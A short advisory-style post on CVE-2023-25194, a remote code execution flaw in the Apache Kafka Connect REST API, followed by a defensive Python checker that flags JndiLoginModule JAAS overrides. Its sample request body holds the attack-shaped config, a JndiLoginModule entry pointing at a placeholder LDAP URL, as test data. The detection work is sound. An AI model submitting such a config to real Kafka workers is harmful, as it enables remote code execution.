This critical vulnerability is tracked as CVE-2023-25194 and was reported on February 8.
The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API.
The vulnerability can only be triggered when there is access to a Kafka Connect worker – a logical work unit component – and the user must also be able to create or modify worker connectors with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. It involves Lightweight Directory Access Protocol (LDAP) and Java Naming and Directory Interface (JNDI) endpoints.
An authenticated attacker can set the sasl.jaas.config property of any of the connector’s Kafka clients to “com.sun.security.auth.module.JndiLoginModule”. This can be done through the following properties:
- producer.override.sasl.jaas.config
- consumer.override.sasl.jaas.config
- admin.override.sasl.jaas.config
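As an added example (not code from the sources above, nor Kafka’s own), a Python check a defender can run over connector definitions submitted to the Connect REST API: it flags the three override properties (or sasl.jaas.config itself) whenever the JAAS entry loads JndiLoginModule. The sample request body and its LDAP URL are constructed placeholders.

```python
# Login module named in the advisory: its user.provider.url option points the
# JVM at an LDAP/JNDI endpoint during SASL login.
JNDI_LOGIN_MODULE = "com.sun.security.auth.module.JndiLoginModule"

def jaas_login_module(jaas_config: str) -> str:
    """Return the login module class a JAAS config string loads: an entry
    reads '<class> <flag> [option=value ...];', so take the first token."""
    tokens = jaas_config.strip().split()
    return tokens[0] if tokens else ""

def find_jndi_jaas_overrides(connector_body: dict) -> list:
    """Return the config keys whose JAAS config loads JndiLoginModule.

    Accepts the bare config map or the Connect REST body {"name": ...,
    "config": {...}}; matches sasl.jaas.config and the producer./consumer./
    admin.override. variants from the advisory. Empty list = nothing flagged.
    """
    config = connector_body.get("config", connector_body)
    return sorted(
        key
        for key, value in config.items()
        if key.endswith("sasl.jaas.config")
        and isinstance(value, str)
        and jaas_login_module(value) == JNDI_LOGIN_MODULE
    )

# Constructed sample request body (not from the sources); the LDAP URL is a
# placeholder. Only the producer override loads JndiLoginModule; the consumer
# override uses the ordinary PlainLoginModule and must not be flagged.
SAMPLE_REQUEST = {
    "name": "example-sink",
    "config": {
        "connector.class": "FileStreamSink",
        "producer.override.security.protocol": "SASL_PLAINTEXT",
        "producer.override.sasl.jaas.config": (
            "com.sun.security.auth.module.JndiLoginModule required "
            'user.provider.url="ldap://placeholder.invalid/";'
        ),
        "consumer.override.sasl.jaas.config": (
            "org.apache.kafka.common.security.plain.PlainLoginModule required "
            'username="svc" password="placeholder";'
        ),
    },
}

if __name__ == "__main__":
    print(find_jndi_jaas_overrides(SAMPLE_REQUEST))
```

The same check can be applied to the output of a worker’s `GET /connectors?expand=config` to audit connectors that already exist.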
Sources:
https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-apache-kafka
https://www.news.de/technik/8567359...-versionen-und-updates-fuer-cve-2023-25194/1/
https://socradar.io/patch-released-for-cve-2023-25194-rce-vulnerability-in-apache-kafka/
https://hackerone.com/reports/1529790